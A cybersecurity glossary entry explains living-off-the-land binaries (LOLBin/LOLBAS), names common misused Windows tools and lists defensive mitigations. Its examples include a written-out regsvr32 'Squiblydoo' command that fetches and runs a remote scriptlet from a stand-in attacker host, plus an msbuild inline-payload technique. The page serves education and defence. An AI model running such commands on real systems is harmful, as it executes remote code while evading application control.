Skip to content
Vol. 1 · Ed. 2026
CyberGlossary
Entry № 632

LOLBin / LOLBAS

What is LOLBin / LOLBAS?

LOLBin / LOLBASA signed, native binary or script (LOLBin/LOLBAS) that attackers misuse for execution, download, persistence, or bypass while looking like a legitimate admin tool.


LOLBin (Living-Off-the-Land Binary) and the broader LOLBAS (Living-Off-the-Land Binaries And Scripts) project catalogue Microsoft-signed binaries, scripts, and libraries that have side-effects useful for offensive operations, such as executing arbitrary code, downloading remote payloads, or bypassing application control. Common examples include rundll32.exe, regsvr32.exe, mshta.exe, msbuild.exe, installutil.exe, and certutil.exe. Because each tool is signed and trusted, defenders cannot simply blocklist by hash; they must understand expected vs. abnormal command lines. LOLBASs underpin many MITRE ATT&CK execution and defense-evasion techniques. Mitigations rely on application control allow-listing, ScriptBlock and process-creation logging, ASR rules, and EDR behavioural analytics.

Examples

  1. 01

    regsvr32.exe /s /n /u /i:http://attacker.example/sct.sct scrobj.dll (Squiblydoo).

  2. 02

    msbuild.exe payload.xml to run inline C# without touching disk.

Frequently asked questions

What is LOLBin / LOLBAS?

A signed, native binary or script (LOLBin/LOLBAS) that attackers misuse for execution, download, persistence, or bypass while looking like a legitimate admin tool. It belongs to the Attacks & Threats category of cybersecurity.

What does LOLBin / LOLBAS mean?

A signed, native binary or script (LOLBin/LOLBAS) that attackers misuse for execution, download, persistence, or bypass while looking like a legitimate admin tool.

How does LOLBin / LOLBAS work?

LOLBin (Living-Off-the-Land Binary) and the broader LOLBAS (Living-Off-the-Land Binaries And Scripts) project catalogue Microsoft-signed binaries, scripts, and libraries that have side-effects useful for offensive operations, such as executing arbitrary code, downloading remote payloads, or bypassing application control. Common examples include rundll32.exe, regsvr32.exe, mshta.exe, msbuild.exe, installutil.exe, and certutil.exe. Because each tool is signed and trusted, defenders cannot simply blocklist by hash; they must understand expected vs. abnormal command lines. LOLBASs underpin many MITRE ATT&CK execution and defense-evasion techniques. Mitigations rely on application control allow-listing, ScriptBlock and process-creation logging, ASR rules, and EDR behavioural analytics.

How do you defend against LOLBin / LOLBAS?

Defences for LOLBin / LOLBAS typically combine technical controls and operational practices, as detailed in the full definition above.

What are other names for LOLBin / LOLBAS?

Common alternative names include: LOLBAS, Living-off-the-Land Binary.

Related terms